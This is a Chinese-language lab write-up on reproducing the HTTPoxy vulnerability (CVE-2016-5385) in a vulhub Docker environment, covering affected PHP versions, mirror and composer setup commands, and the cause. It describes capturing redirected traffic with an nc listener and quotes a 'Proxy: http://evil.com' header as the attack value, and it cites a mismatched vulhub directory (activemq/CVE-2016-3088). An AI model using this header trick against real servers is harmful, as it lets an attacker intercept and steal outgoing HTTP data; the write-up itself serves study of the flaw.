HTTPoxy漏洞(CVE-2016-5385)
1.漏洞影响版本
vulhub中的环境使用的是php
受影响的php版本:
PHP 5.5.37
PHP 5.6.23
PHP 7.0.8
CVE-2016-5385详情信息
2.漏洞危害
重定向HTTP数据到任意代理服务器
3.漏洞POC
不用梯子,添加如下内容到Dockerfile中,否则dockerfile中有apt-get update使用Ubuntu官方源,特别慢或者出错
RUN mv /etc/apt/sources.list /etc/apt/sources.list.bak && \
echo 'deb http://mirrors.163.com/debian/ jessie main non-free contrib' > /etc/apt/sources.list && \
echo 'deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib' >> /etc/apt/sources.list && \
echo 'deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib' >> /etc/apt/sources.list
部署虚拟机
cd /root/vulhub/activemq/CVE-2016-3088 ////进入本次复现的vulhub目录
docker-compose build
Dockerfile取出dockerfile中的最后两行
安装composer进入刚才编译好的docker环境
docker ps -a
docker start CONTANER ID
docker exec -it CONTANER ID /bin/bash
依次执行如下命令
composer config -g repo.packagist composer https://packagist.phpcomposer.com
composer install
composer update
apt-get purge -y --auto-remove wget zip unzip
docker-compose up -d ////docker-compose搭建nginx环境
直接访问页面正常如果是公网服务器,Host与Origin应该是相同的
获取origin被修改期间的http数据使用nc监听端口,添加监听机的Proxy:IP,接受重定向的http数据
4.复盘
漏洞出现原因
简单来说,根据RFC 3875规定,cgi(fastcgi)要将用户传入的所有HTTP头都加上HTTP_前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com,进而窃取数据包中可能存在的敏感信息。
总结
1.Debian不是Ubuntu。
2.第一次被更新源限制了,但是找到了解决办法,修改Debian更新源,修改Composer下载源。
网友评论